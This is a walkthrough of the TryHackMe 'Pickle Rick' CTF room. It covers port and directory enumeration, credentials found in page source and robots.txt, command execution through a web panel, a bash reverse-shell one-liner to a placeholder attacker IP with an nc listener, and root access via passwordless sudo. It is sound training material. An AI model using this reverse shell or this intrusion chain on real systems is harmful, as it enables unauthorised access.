---
title: Pickle Rick
subtitle: A Rick and Morty CTF. Help turn Rick back into a human!
tags:
- Linux
- BurpSuite
- Gobuster
- bash shell
thumbnail-img: assets/img/picklerick/picklerick1.jpeg
---

![](../../assets/img/picklerick/picklerick1.jpeg){: .mx-auto.d-block :}

This is a **free** [room](https://tryhackme.com/room/picklerick) from [TryHackMe](https://tryhackme.com), created by [tryhackme](https://tryhackme.com/p/tryhackme).

{: .box-warning}

**Disclaimer:** No flags (user/root) are shown in this **writeup**, so follow the procedures to grab the flags! Enjoy! 👽️

# Setting-up the Environment

First of all, we are going to connect to the **VPN** using my custom [script](https://github.com/RaulSanchezzt/dotfiles/blob/master/scripts/vpn.sh) that I have defined the path of the script in the [`.zshrc`](https://github.com/RaulSanchezzt/dotfiles/blob/master/.zshrc) file.

```java
❯ which vpn
vpn: aliased to sh ~/dotfiles/scripts/vpn.sh

❯ vpn thm
```

Then, start the machine and now we are going to use this [**script**](https://github.com/RaulSanchezzt/dotfiles/blob/master/scripts/thm.sh) to add the *IP* address and **hostname** of this box to the **hosts** file, **allow connections from the target** to our machine and create our working directory. 

```java
❯ which thm
thm: aliased to sh ~/dotfiles/scripts/thm.sh
```

We will run the script and write the information of this machine.

```java
❯ thm
[!] /etc/hosts file restored from /etc/hosts.bak
[?] Type the IP address of the box: 10.10.188.231
[?] Type the name of the box: PickleRick

[!] Try Hack Me Machine
10.10.188.231 PickleRick.thm

[!] Firewall
Status: active

     To                         Action      From
     --                         ------      ----
[ 1] Anywhere                   ALLOW IN    10.10.188.231             

[!] Working directory created
[!] Initial configuration completed
```

# 1. Enumeration

Now we can simply ping to domain name of the machine to check our **VPN** connection and whether machine is alive. Sometimes machines might "Disable" ping requests from passing through the firewall. But in most case ping will be a success!

```java
❯ ping -c1 picklerick.thm
PING PickleRick.thm (10.10.188.231) 56(84) bytes of data.
64 bytes from PickleRick.thm (10.10.188.231): icmp_seq=1 ttl=63 time=53.0 ms

--- PickleRick.thm ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 52.994/52.994/52.994/0.000 ms
```

To identify which operating system is the target running. We will use the [whichSystem.py](https://github.com/RaulSanchezzt/kali-bspmw/blob/master/tools/whichSystem.py) tool.

```java
❯ whichSystem.py picklerick.thm

picklerick.thm (TTL -> 63): Linux
```

{: .box-note}

By default Linux has a TTL of 64 and Windows has 128.

## 1.1 Nmap

Then, we will use the [nmap](https://nmap.org/) tool with the following parameters:

- [-p-](https://nmap.org/book/nmap-overview-and-demos.html) : scan every TCP port [0-65535].
- [--open](https://nmap.org/book/man-port-scanning-basics.html) : show only the applications that are actively accepting TCP connections.
- [-sS](https://nmap.org/book/man-port-scanning-techniques.html) : set TCP SYN scan.
- [--min-rate 5000](https://nmap.org/book/man-performance.html) : send packets as fast as or faster than the given rate.
- [-vvv](https://nmap.org/book/osdetect-usage.html#osdetect-ex-scanme1) : increase the verbosity.
- [-n](https://nmap.org/book/host-discovery-dns.html) : No DNS resolution.
- [-Pn](https://nmap.org/book/man-host-discovery.html) : No Ping.
- {name}.thm : Target machine.
- [-oG](https://nmap.org/book/output-formats-grepable-output.html) : Grepeable output.
- allPorts : Output file name.

```java
❯ sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn picklerick.thm -oG allPorts
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-20 16:19 CEST
Initiating SYN Stealth Scan at 16:19
Scanning picklerick.thm (10.10.188.231) [65535 ports]
Discovered open port 80/tcp on 10.10.188.231
Discovered open port 22/tcp on 10.10.188.231
Completed SYN Stealth Scan at 16:19, 20.20s elapsed (65535 total ports)
Nmap scan report for picklerick.thm (10.10.188.231)
Host is up, received user-set (0.063s latency).
Scanned at 2022-08-20 16:19:13 CEST for 20s
Not shown: 58747 closed tcp ports (reset), 6786 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 20.31 seconds
           Raw packets sent: 100362 (4.416MB) | Rcvd: 62034 (2.481MB)
```

This is the function that I have defined in the [zsh](https://github.com/RaulSanchezzt/dotfiles/blob/master/.zshrc) configuration file to extract TCP ports.

```python
❯ which extractPorts
extractPorts () {
    ports="$(cat $1 | grep -oP '\d{1,5}/open' | awk '{print $1}' FS='/' | xargs | tr ' ' ',')" 
    ip_address="$(cat $1 | grep -oP '\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}' | sort -u | head -n 1)" 
    echo -e "\n${yellowColour}[*] Extracting information...${endColour}\n"
    echo -e "\t${grayColour}[*] IP Address:${endColour} ${greenColour} $ip_address${endColour}"
    echo -e "\t${grayColour}[*] Open ports:${endColour} ${redColour} $ports${endColour}\n"
    echo $ports | tr -d '\n' | xclip -sel clip
    echo -e "${blueColour}[*] Ports copied to clipboard${endColour}\n"
}
```

Use the command to extract the **TCP ports**.

```java
❯ extractPorts allPorts

[*] Extracting information...

    [*] IP Address:  10.10.188.231
    [*] Open ports:  22,80

[*] Ports copied to clipboard
```

We will see the open ports on the target machine so now, we are going to use [nmap](https://nmap.org/) again using the parameters below:

- [-sV](https://nmap.org/book/man-version-detection.html) : to see the services and their version.
- [-sC](https://nmap.org/book/man-nse.html) : to performs a script scan using the default set of scripts.
- [-Pn](https://nmap.org/book/man-host-discovery.html) : No Ping.
- [-p](https://nmap.org/book/scan-methods-ip-protocol-scan.html) : to determine which IP protocols are supported by target machine.
- {name}.thm : Target machine.
- [-oN](https://nmap.org/book/output-formats-normal-output.html) : Normal output.
- targeted : Output file name.

```python
❯ nmap -sV -sC -Pn -p22,80 picklerick.thm -oN targeted
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-20 16:20 CEST
Nmap scan report for picklerick.thm (10.10.188.231)
Host is up (0.058s latency).
rDNS record for 10.10.188.231: PickleRick.thm

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c5:0b:1c:93:ec:b0:ec:3d:00:8e:79:9c:41:77:ef:fe (RSA)
|   256 64:0a:61:f2:d9:98:e2:75:16:57:74:43:66:b1:ed:eb (ECDSA)
|_  256 d6:a0:77:4a:66:8b:5e:56:8d:73:16:74:e9:a0:69:af (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Rick is sup4r cool
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.93 seconds
```

{: .box-error}

You can find the man page of nmap [here](https://nmap.org/book/toc.html).

## 1.2 Web

First we will use the [whatweb](https://www.kali.org/tools/whatweb/) tool to view the components of the web page from the **terminal**.

```java
❯ whatweb http://10.10.188.231
http://10.10.188.231 [200 OK] Apache[2.4.18], Bootstrap, Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.10.188.231], JQuery, Script, Title[Rick is sup4r cool]
```

Then we will access from the browser and it will give us a hint to use **BurpSuite**.

![](../../assets/img/picklerick/picklerick2.png){: .mx-auto.d-block :}

## 1.3 BurpSuite

Here we will intercept a request and see nothing unusual so we will send it to the **Repeater**.

![](../../assets/img/picklerick/picklerick3.png){: .mx-auto.d-block :}

In the **Repeater** we will see that in the server's **response** there is a **Username**.

![](../../assets/img/picklerick/picklerick4.png){: .mx-auto.d-block :}

## 1.4 Gobuster

Then we will use [gobuster](https://www.kali.org/tools/gobuster/) to search for hidden **directories** or **files** on the web server.

```java
❯ gobuster dir -u http://picklerick.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,sh,txt,cgi,html,css,js,py
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://picklerick.thm
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              py,php,sh,txt,cgi,html,css,js
[+] Timeout:                 10s
===============================================================
2022/08/20 16:52:05 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 1062]
/login.php            (Status: 200) [Size: 882] 
/assets               (Status: 301) [Size: 317] [--> http://picklerick.thm/assets/]
/portal.php           (Status: 302) [Size: 0] [--> /login.php]                     
/robots.txt           (Status: 200) [Size: 17]                                     


===============================================================
2022/08/20 16:57:12 Finished
===============================================================
```

We will look for the `robots.txt` file and here we will find a word that looks like a **password**.

![](../../assets/img/picklerick/picklerick5.png){: .mx-auto.d-block :}

# 2. Foothold

## 2.1 Remote Command Execution

We will enter the page to log in with the **username** and **password** we found before.

![](../../assets/img/picklerick/picklerick6.png){: .mx-auto.d-block :}

Once inside we will see a **command panel** where we can execute commands on the **system**.

![](../../assets/img/picklerick/picklerick7.png){: .mx-auto.d-block :}

Using the command `ls -la` we will see the files in the **current path**.

![](../../assets/img/picklerick/picklerick8.png){: .mx-auto.d-block :}

We can view the contents of the `Sup3rS3cretPickl3Ingred.txt` file using the browser.

![](../../assets/img/picklerick/picklerick9.png){: .mx-auto.d-block :}

The `clue.txt` file will give us a **clue** to continue searching the system.

![](../../assets/img/picklerick/picklerick10.png){: .mx-auto.d-block :}

## 2.2 Getting a Shell

To search in a more **comfortable** way let's try to connect through our computer by executing the following command in the browser.

```java
bash -c 'bash -i >& /dev/tcp/<TUN0_IP>/<LISTEN_PORT> 0>&1'
```

![](../../assets/img/picklerick/picklerick11.png){: .mx-auto.d-block :}

On our computer we will execute the following **command** to **receive** the `shell`.

```java
❯ sudo nc -lvnp 80
listening on [any] 80 ...
connect to [10.18.67.82] from (UNKNOWN) [10.10.188.231] 41030
www-data@ip-10-10-188-231:/var/www/html$ whoami
whoami
www-data
```

The **second ingredient** will be found in the `/home` directory of the user `rick`.

```java
www-data@ip-10-10-188-231:/var/www/html$ cd /home
cd /home
www-data@ip-10-10-188-231:/home$ ls
ls
rick
ubuntu
www-data@ip-10-10-188-231:/home$ cd rick
cd rick
www-data@ip-10-10-188-231:/home/rick$ ls
ls
second ingredients
www-data@ip-10-10-188-231:/home/rick$ cat second\ ingredients
cat second\ ingredients
```

## 2.3 root user

The user **www-data can execute anything as sudo**:

```java
www-data@ip-10-10-188-231:/home/rick$ sudo -l
sudo -l
Matching Defaults entries for www-data on
    ip-10-10-188-231.eu-west-1.compute.internal:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on
        ip-10-10-188-231.eu-west-1.compute.internal:
    (ALL) NOPASSWD: ALL
```

We can become **sudo** using the command `sudo su`. In this way we will see the **third ingredient**.

```java
www-data@ip-10-10-188-231: home/rick$ sudo su
sudo su

whoami
root

cd /root

ls
3rd.txt
snap

cat 3rd.txt
```

I hope you made it too, see you next timee! 🙃